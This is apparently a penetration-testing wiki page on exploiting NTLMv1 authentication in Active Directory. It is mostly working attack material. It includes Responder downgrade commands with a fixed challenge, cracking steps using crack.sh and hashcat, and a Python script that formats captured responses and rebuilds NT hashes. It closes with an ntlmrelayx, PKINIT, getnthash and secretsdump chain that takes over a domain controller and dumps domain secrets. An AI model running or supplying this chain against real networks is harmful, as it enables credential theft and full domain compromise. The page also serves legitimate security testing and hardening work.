# NTLMv1

NT LAN Manager version 1 (NTLMv1) is vulnerable to several attacks (a captured response can be turned back into the account's NT hash itself) and should be disabled wherever possible. Every supported Microsoft operating system supports its successor, NT LAN Manager version 2 (NTLMv2), which should be used instead.

An NTLMv1 capture, as written by Responder (hashcat mode 5500), has the fields shown below. When the server challenge is the fixed value `1122334455667788` and ESS/SSP is not in use, only the NT response is needed for crack.sh's rainbow tables, submitted with the `NTHASH:` prefix:

```bash
username::hostname:lm_response:nt_response:challenge -> NTHASH:nt_response
```

### Downgrading

Where the target still allows NTLMv1 (an `LmCompatibilityLevel` below 3), a computer that is coerced into authenticating to us can be asked for an NTLMv1 response instead of NTLMv2.

Coercing the callback is covered in the [Coercion section](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/coercing-authentication). Before triggering it, set `Challenge = 1122334455667788` in `Responder.conf` (the fixed challenge crack.sh's rainbow tables are built for) and start Responder with the downgrade options:

```bash
# Force an NTLMv1 (LM/NT response) downgrade; the capture may still carry ESS/SSP
Responder.py -I $interface --lm

# Additionally ask the client to drop ESS/SSP, so the NT response is plain DES of the
# fixed challenge and can be looked up in crack.sh's rainbow tables (or cracked locally)
Responder.py -I $interface --lm --disable-ess
```

### Cracking NTLMv1

Referencing crack.sh, an NTLMv1 hash with ESS/SSP looks like the following. The LM response field gives it away: an 8-byte client nonce followed by 16 zero bytes rather than a real LM response:

```
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788
```

After obtaining a hash with ESS/SSP, reformat it with EvilMog's [NTLMv1-multi tool](https://github.com/evilmog/ntlmv1-multi), which splits the NT response into the DES blocks hashcat cracks and reassembles the NT hash from the recovered keys, or feed it to [assless-chaps](https://github.com/sensepost/assless-chaps), which checks it against a database of NT hashes. The result in both cases is the account's NT hash, usable directly for pass-the-hash.

{% hint style="warning" %}
If Responder was unable to remove ESS/SSP, the plaintext that was DES-encrypted is `MD5(server challenge || client nonce)[:8]` rather than the fixed challenge, so crack.sh's rainbow tables no longer apply. The hash can instead be submitted to crack.sh and cracked for a fee (a full DES keyspace search), or brute-forced locally with hashcat mode 14000.
{% endhint %}
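The reformatting step those tools perform, as an added example in Python (this is not code from the page, nor from ntlmv1-multi or assless-chaps). It assumes the Responder / hashcat mode 5500 line layout described above, uses the crack.sh sample line as its input, detects ESS/SSP from the LM response field, derives the plaintext that was actually DES-encrypted, emits the three hashcat mode 14000 `ciphertext:plaintext` lines, and rebuilds the NT hash from recovered 8-byte DES keys (the `NTHASH:` crack.sh submission format follows the page's description; the second, non-ESS line is constructed):

```python
"""Reformat a captured NTLMv1 response for cracking.

Added example, not the page's own code and not ntlmv1-multi's. It performs the
same first step those tools do: detect ESS/SSP, derive the 8-byte DES plaintext,
split the 24-byte NT response into three DES blocks for hashcat -m 14000, and
stitch the recovered DES keys back into the NT hash.
"""
import hashlib

# Responder's fixed server challenge (Challenge = 1122334455667788 in Responder.conf).
FIXED_CHALLENGE = "1122334455667788"

# Sample capture with ESS/SSP, the crack.sh example quoted on the page.
SAMPLE_ESS = ("hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:"
              "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788")


def parse_ntlmv1(line):
    """Split a hashcat 5500 line: username::hostname:lm_response:nt_response:challenge."""
    user, _empty, host, lm_resp, nt_resp, challenge = line.strip().split(":")
    if len(lm_resp) != 48 or len(nt_resp) != 48 or len(challenge) != 16:
        raise ValueError("not an NTLMv1 response line")
    return {"user": user, "host": host, "lm": lm_resp.upper(),
            "nt": nt_resp.upper(), "challenge": challenge.upper()}


def uses_ess(parsed):
    """With ESS/SSP (NTLM2 session security) the LM response field carries an
    8-byte client nonce followed by 16 zero bytes instead of a real LM response."""
    return parsed["lm"][16:] == "0" * 32


def effective_challenge(parsed):
    """Plaintext the client DES-encrypted under the NT-hash-derived keys.
    No ESS: the server challenge itself. ESS: MD5(server_challenge || client_nonce)[:8],
    so a fixed server challenge no longer yields a fixed plaintext and the
    fixed-challenge rainbow tables do not apply."""
    if not uses_ess(parsed):
        return parsed["challenge"]
    client_nonce = bytes.fromhex(parsed["lm"][:16])
    digest = hashlib.md5(bytes.fromhex(parsed["challenge"]) + client_nonce).digest()
    return digest[:8].hex().upper()


def to_cracksh(parsed):
    """crack.sh rainbow-table submission (NTHASH:<nt_response>), valid only when the
    plaintext really was the fixed challenge: no ESS and Challenge = 1122334455667788."""
    if uses_ess(parsed) or parsed["challenge"] != FIXED_CHALLENGE:
        return None
    return "NTHASH:" + parsed["nt"]


def to_hashcat_14000(parsed):
    """hashcat -m 14000 lines (ciphertext:plaintext). ct_i = DES_{K_i}(plaintext), where
    K_1, K_2, K_3 come from NT hash bytes 0-6, 7-13 and 14-15 padded with five zero bytes.
    Blocks 1 and 2 need a full 56-bit keyspace search; block 3 has only 2^16 keys."""
    pt = effective_challenge(parsed)
    nt = parsed["nt"]
    return [f"{nt[0:16]}:{pt}", f"{nt[16:32]}:{pt}", f"{nt[32:48]}:{pt}"]


def des_key_to_key7(key8):
    """hashcat returns 8-byte DES keys whose low bit per byte is parity; drop it
    to get back the 7 NT-hash bytes the key was built from."""
    bits = "".join(format(b >> 1, "07b") for b in key8)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, 56, 8))


def key7_to_des_key(key7):
    """Inverse of des_key_to_key7: spread 56 bits over 8 bytes with odd parity."""
    bits = "".join(format(b, "08b") for b in key7)
    out = []
    for i in range(0, 56, 7):
        seven = int(bits[i:i + 7], 2) << 1
        out.append(seven | (1 if bin(seven).count("1") % 2 == 0 else 0))
    return bytes(out)


def recover_nt_hash(key1, key2, key3):
    """Reassemble the NT hash from the three recovered 8-byte DES keys."""
    return (des_key_to_key7(key1) + des_key_to_key7(key2) + des_key_to_key7(key3)[:2]).hex()


if __name__ == "__main__":
    parsed = parse_ntlmv1(SAMPLE_ESS)
    print("ESS/SSP in use:", uses_ess(parsed))
    print("effective challenge:", effective_challenge(parsed))
    print("crack.sh submission:", to_cracksh(parsed))
    for line in to_hashcat_14000(parsed):
        print("-m 14000:", line)
```

Running the file prints the derived plaintext and the three mode 14000 lines for the sample. Blocks 1 and 2 require searching the full 56-bit DES keyspace (hashcat on GPUs, or crack.sh's paid service); block 3 has only 65536 candidate keys and falls in seconds, which is why its two NT-hash bytes are the cheap starting point assless-chaps uses to narrow a hash database lookup.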

### Attacking a Domain Controller

If NTLMv1 is enabled, a domain controller's coerced authentication can be relayed to LDAP on another domain controller: NTLMv1 responses carry no MIC, so the relay can strip the signing negotiation (`--remove-mic`), and because DCs can modify their own msDS-KeyCredentialLink attribute, ntlmrelayx can add a shadow credential for the relayed DC's machine account. Two domain controllers are required because the coerced DC cannot be relayed back to itself.

```bash
# 1. Relay DC2's coerced authentication to LDAP on DC1 and write a shadow credential for DC2$
ntlmrelayx.py -t ldap://$dc1 -of hashes --shadow-credentials --shadow-target 'DC2$' --cert-outfile-path crt --no-validate-privs --remove-mic

# 2. PKINIT with the certificate: get a TGT for DC2$ and note the AS-REP key that is printed
gettgtpkinit.py -cert-pfx crt.pfx -pfx-pass PFX_PASSWORD contoso.com/DC2\$ crt.ccache

# 3. Recover DC2$'s NT hash (U2U) using the TGT and the AS-REP key
KRB5CCNAME=crt.ccache getnthash.py contoso.com/DC2\$ -key KEY_FROM_PKINIT

# 4. DCSync as DC2$ (-hashes takes LM:NT; the LM half is left empty)
secretsdump.py 'contoso.com/DC2$'@DC2 -hashes :NTHASH_FROM_GETNTHASH -history
```

### References

{% embed url="https://crack.sh/cracking-ntlmv1-w-ess-ssp/" %}

{% embed url="https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/" %}

{% embed url="https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/" %}

{% embed url="https://twitter.com/godacity_/status/1646282884020580352" %}
